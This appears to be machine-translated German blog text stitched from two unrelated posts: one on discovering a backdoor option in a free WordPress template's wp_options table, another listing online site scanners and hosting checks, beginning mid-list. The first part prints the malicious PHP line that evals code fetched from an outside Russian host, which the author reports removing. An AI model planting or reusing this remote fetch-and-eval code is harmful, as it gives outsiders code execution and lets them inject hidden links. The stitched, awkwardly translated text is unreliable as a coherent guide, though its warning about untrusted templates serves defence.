Die in der Datenbank angeforderte interessante Option blogoption sieht ebenfalls sehr verdächtig aus. Gehen wir zu unserer Datenbank MySQL-Daten und finden Sie dort eine Tabelle mit dem Namen wp_options. Wenn Sie die Präfixe nicht geändert haben, sieht sie standardmäßig so aus. Und darin finden wir die Zeile, die uns interessiert, namens blogoption

Was für eine Schönheit! Wir sehen die folgende Option

return eval(file_get_contents(‘http://wpru.ru/aksimet.php?id=’.$post->ID.’&m=47&n’));

Diese. Von einer bestimmten Website (und wohlgemerkt einer russischen) werden Inhalte zurückgegeben, die alles enthalten können! Beliebig viele Links, Schadcodes, veränderte Texte usw. Wenn Sie auf die Website selbst zugreifen, erhalten Sie einen 403-Zugriffsfehler, was nicht überraschend ist. Natürlich habe ich diese Option auch aus der Datenbank entfernt.

Nach Angaben von Opfern wird der genaue Inhalt Ihres Artikels in der Regel mit nur einer Änderung zurückgegeben – anstelle eines Punktes „.“ Im Text wurde ein offener Link versteckt! Und nebenbei, diese Option wird in die Datenbank geschrieben, wenn die Vorlage selbst installiert wird, und dann zerstört sich der Code, der dies erfolgreich durchführt, selbst. Und ich habe zwei Jahre lang mit solch einem Müll gelebt, und kein einziges Antivirenprogramm oder Dienst hat ihn für mich entdeckt diese Bedrohung für die ganze Zeit. Um ehrlich zu sein, habe ich nicht bemerkt, ob dieser Trick jemals bei mir funktioniert hat oder ob mein Sicherheits-Plugin diese Funktion blockiert hat (oder vielleicht eines der WordPress-Updates diese Lücke geschlossen hat), aber es ist trotzdem unangenehm.

Moral über kostenlosen Käse

Wie gefällt Ihnen die Raffinesse unserer „Übersetzer“ von Vorlagen (oder derjenigen, die sie in ihren Katalogen veröffentlichen)? Es ist nicht Ihre Aufgabe, Links aus der Fußzeile herauszuschneiden.) Schade, dass ich mich nicht mehr erinnern kann, wo ich meine Vorlage heruntergeladen habe, das ist schon lange her, sonst hätte ich auf jeden Fall ein paar liebevolle Links geschrieben. Und wenn ich damals die gleiche Erfahrung gemacht hätte wie jetzt, hätte ich es definitiv nicht genutzt kostenlose Vorlage, oder als letzten Ausweg würde ich nicht von unbekannten Quellen herunterladen!

Es ist einfacher, ein offizielles Premium-Template für 15 bis 20 Dollar zu kaufen und in Frieden zu leben, mit dem Wissen, dass es keine Lücken oder verschlüsselten Links enthält, und selbst wenn es Schwachstellen gibt, werden die Entwickler auf jeden Fall ein Update veröffentlichen, in dem diese Lücken enthalten sein werden geschlossen. ( Übrigens hat Artem kürzlich einen Artikel veröffentlicht, in dem er über Premium-Vorlagen spricht und sogar Aktionscodes für brutale Rabatte an Interessierte verteilt)

Hallo IdeaFox-Freunde!

Ich weiß nicht, wie es dir geht, aber ich habe nachts Schlafstörungen. Ich quäle mich mit Blog-Sicherheitsproblemen. Ich habe keine Kraft mehr :-)

Ich habe eine Reihe von Blogs zu diesem Thema gelesen und viele Plugins getestet, die zur Lösung dieses Problems beitragen. Und in den Kommentaren begannen sie, Fragen zum Thema Site-Schutz zu stellen, was mich dazu veranlasste, diese Notiz zu schreiben.

Stellen Sie sich vor, Sie führen einen Blog, schreiben Artikel, versuchen es... Und böse Arschlöcher kommen und zerstören Ihre Website. Ich denke, es wird viel Trauer geben.

Schließlich investiert jeder normale Blogger viel Zeit und Mühe in die Entwicklung seiner Website. Und für viele wird das Bloggen generell zur Obsession... Hier und bis, wenn DAS passiert :-)

Nun, Sie verstehen, wie wichtig das ist.

Kommen wir endlich zur Sache :)

Vor ein paar Monaten habe ich bereits eine Notiz zum Thema Hacking geschrieben. Lesen Sie es unbedingt durch. Doch seitdem ist ziemlich viel Zeit vergangen und ich habe zusätzliche Maßnahmen ergriffen, um die Gesamtverteidigung zu stärken.

In den folgenden Anmerkungen werde ich auf jeden Fall ausführlich auf dieses Thema eingehen. (Ich erinnere mich auch an die ISP-Einstellungen und schreibe darüber)

3. Überprüfen Sie die Website auf andere Online-Dienste

An solchen Diensten mangelt es nicht. Ich bin der festen Überzeugung, dass viele von ihnen völlig dumm sind und nur für die Anzeige von Werbung geschaffen wurden.

Doktor Web

DR.Web-Unternehmen gemacht guter Service um Websites online zu überprüfen. Persönlich hat er mir einmal dabei geholfen, eine Infektion im Blog eines Freundes zu finden (in der .htaccess-Datei befand sich Code von Drittanbietern).

Die Prüfung ist sehr einfach. Geben Sie Ihre URL ein und warten Sie auf das Verifizierungsergebnis.

antivirus-alarm.ru

Ein leistungsstarker Website-Scanner, der bis zu 43 Antiviren-Datenbanken der weltweit führenden Antiviren-Unternehmen nutzt.

Auch hier ist alles ganz einfach. Wir geben die URL unserer Seite ein und warten gespannt auf die Scan-Ergebnisse.

Darauf habe ich gewartet.

Alles ist sauber, man kann ruhig schlafen :-)

Das alles ist natürlich gut, aber Sie müssen auch ein paar Plugins installieren, die für WordPress-Blogs überhaupt nicht schaden.

4. Bitten Sie Ihren Host, Ihre Website zu überprüfen

Tatsache ist, dass Hoster sich noch mehr Gedanken über Sicherheitsfragen machen als Sie und über wirksame Sicherheitsmaßnahmen verfügen. Darüber hinaus mit speziellen Schutzmitteln.

Das sind die Neuigkeiten, die ich heute für Sie habe. Als nächstes erzähle ich Ihnen von einem sehr leistungsstarken Plugin, das Ihr WordPress-Blog erheblich vor Hackern schützen kann.

Ich arbeite bereits seit 2 Monaten mit ihm zusammen und bin sehr zufrieden mit ihm. Während ich es herausgefunden habe, habe ich mich dreimal selbst gesperrt: –) Kurz gesagt, es gibt etwas zu erzählen.